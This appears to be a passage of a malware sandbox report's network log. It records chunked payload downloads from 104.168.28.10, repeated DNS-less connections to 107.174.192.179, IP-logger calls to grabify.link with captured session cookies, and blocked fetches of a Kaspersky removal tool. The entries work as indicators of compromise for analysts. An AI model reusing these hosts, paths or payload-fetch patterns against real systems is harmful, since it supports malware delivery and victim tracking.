                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=294912-327679User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=327680-360447User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=360448-393215User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=393216-458751User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=458752-524287User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=524288-589823User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=589824-655359User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=655360-720895User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=720896-786431User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=786432-851967User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=851968-917503User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=917504-1048575User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1048576-1179647User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1179648-1310719User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1310720-1441791User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1441792-1572863User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1572864-1703935User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1703936-1835007User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1835008-1966079User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1966080-2228223User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2228224-2490367User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2490368-2752511User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2752512-3014655User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3014656-3276799User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3276800-3538943User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3538944-4063231User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4063232-4587519User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4587520-4849663User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4849664-5373951User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5373952-5606383User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDC34A0 recv,4_2_000001C3DDDC34A0
                    Source: global trafficHTTP traffic detected: GET /ZATFQO HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: grabify.link
                    Source: global trafficHTTP traffic detected: GET /images/pixel.png HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: grabify.linkCookie: g_session=eyJpdiI6IkY2WEtLTU1vWVhUSUp6VVdjTzkwd0E9PSIsInZhbHVlIjoia01wOWxMK2ZrTXh0RUoxZ1VJWjdPMGI5VkVMMm5MUlM3b2pRdmpnRlFSUDJCSnh4bUtnakx5dTBRVmZiMDdMZldEYVFvOXNPUWpZMnFUUU5zeEZDeEdtY1g2NFY3cmUvTnV0WVNrTzRESmd2VkJEZ24yVmc0b05USllyNjVmbkciLCJtYWMiOiI2ZGM4MjczNjczZDNlNThkNTI3NjI1YzM3ZTQwZGIxMjRjM2I0OGJkYjBjZDBlYTE1NjVkZTEzZDgwZDI1NWE2IiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6ImZHMC9uUEtPdXFMaVRMTS9qN0ZEMnc9PSIsInZhbHVlIjoiMlFNaFhBcEYyMitWNmVXNlpFdEdKQVFvWnJPZXE0R1pCbnlFdC92dzJCaGVnQnMxdUo5ZWQ4Z1Ewd25DeUppaWNUWnJNOHRzalRpc3ZucWJUQjU0Z2dmWlBobUZqZnl1K3VvdGNkRFdNeW1wcTdhdUx4N3YySVBBSHI5WTRGWWYiLCJtYWMiOiJiYmQzM2IyMWI1ZGE0OWNhYTJkMGU4YjY2MzZmYmQ2YmRjZTViMGJjOTlkOGM1NDVjN2I1ZTcxMmJkMzMzNDQ2IiwidGFnIjoiIn0%3D
                    Source: global trafficHTTP traffic detected: GET /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1Host: devbuilds.s.kaspersky-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57Accept: */*
                    Source: global trafficHTTP traffic detected: GET /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1Host: devbuilds.s.kaspersky-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57Accept: */*
                    Source: global trafficHTTP traffic detected: GET /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1Host: devbuilds.s.kaspersky-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57Accept: */*
                    Source: global trafficHTTP traffic detected: GET /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1Host: devbuilds.s.kaspersky-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57Accept: */*
                    Source: global trafficHTTP traffic detected: GET /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1Host: devbuilds.s.kaspersky-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57Accept: */*
                    Source: global trafficHTTP traffic detected: GET /data/003 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: 107.174.192.179
                    Source: global trafficHTTP traffic detected: GET /clean HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: 107.174.192.179
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=0-16383User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=16384-32767User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=32768-49151User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=49152-65535User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=98304-114687User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=81920-98303User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=65536-81919User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=114688-131071User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=131072-163839User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=163840-196607User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=196608-229375User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=229376-262143User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=262144-294911User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=294912-327679User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=327680-360447User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=360448-393215User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=393216-458751User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=458752-524287User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=524288-589823User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=589824-655359User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=655360-720895User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=720896-786431User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=786432-851967User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=851968-917503User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=917504-1048575User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1048576-1179647User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1179648-1310719User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1310720-1441791User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1441792-1572863User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1572864-1703935User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1703936-1835007User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1835008-1966079User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1966080-2228223User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2228224-2490367User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2490368-2752511User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2752512-3014655User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3014656-3276799User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3276800-3538943User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3538944-4063231User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4063232-4587519User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4587520-4849663User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4849664-5373951User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5373952-5606383User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficDNS traffic detected: DNS query: grabify.link
                    Source: global trafficDNS traffic detected: DNS query: devbuilds.s.kaspersky-labs.com
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 04 Apr 2025 06:44:36 GMTContent-Length: 353Connection: closeCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: klid=39881c0467ef7fd4751619b2ac5239ea; domain=.kaspersky-labs.com; path=/; expires=Sat, 04-Apr-2026 06:44:36 GMT; HttpOnly
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 04 Apr 2025 06:44:37 GMTContent-Length: 353Connection: closeCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: klid=39881c0467ef7fd5751619b4ac488993; domain=.kaspersky-labs.com; path=/; expires=Sat, 04-Apr-2026 06:44:37 GMT; HttpOnly
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 04 Apr 2025 06:44:38 GMTContent-Length: 353Connection: closeCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: klid=39881c0467ef7fd6751619a9ac41d052; domain=.kaspersky-labs.com; path=/; expires=Sat, 04-Apr-2026 06:44:38 GMT; HttpOnly
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 04 Apr 2025 06:44:39 GMTContent-Length: 353Connection: closeCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: klid=39881c0467ef7fd7751619abac48f1e2; domain=.kaspersky-labs.com; path=/; expires=Sat, 04-Apr-2026 06:44:39 GMT; HttpOnly
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 04 Apr 2025 06:44:39 GMTContent-Length: 353Connection: closeCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: klid=39881c0467ef7fd7751619adac52c0d5; domain=.kaspersky-labs.com; path=/; expires=Sat, 04-Apr-2026 06:44:39 GMT; HttpOnly
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 04 Apr 2025 06:44:40 GMTContent-Length: 353Connection: closeCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: klid=39881c0467ef7fd8751619aeac4a2717; domain=.kaspersky-labs.com; path=/; expires=Sat, 04-Apr-2026 06:44:40 GMT; HttpOnly
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 04 Apr 2025 06:44:40 GMTContent-Length: 353Connection: closeCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: klid=39881c0467ef7fd8751619b0ac440d3b; domain=.kaspersky-labs.com; path=/; expires=Sat, 04-Apr-2026 06:44:40 GMT; HttpOnly
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 04 Apr 2025 06:44:41 GMTContent-Length: 353Connection: closeCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: klid=39881c0467ef7fd9751619b2ac524d21; domain=.kaspersky-labs.com; path=/; expires=Sat, 04-Apr-2026 06:44:41 GMT; HttpOnly
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 04 Apr 2025 06:44:41 GMTContent-Length: 353Connection: closeCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: klid=39881c0467ef7fd9751619b6ac4a7109; domain=.kaspersky-labs.com; path=/; expires=Sat, 04-Apr-2026 06:44:41 GMT; HttpOnly
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 04 Apr 2025 06:44:42 GMTContent-Length: 353Connection: closeCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: klid=39881c0467ef7fda751619b8ac484563; domain=.kaspersky-labs.com; path=/; expires=Sat, 04-Apr-2026 06:44:42 GMT; HttpOnly
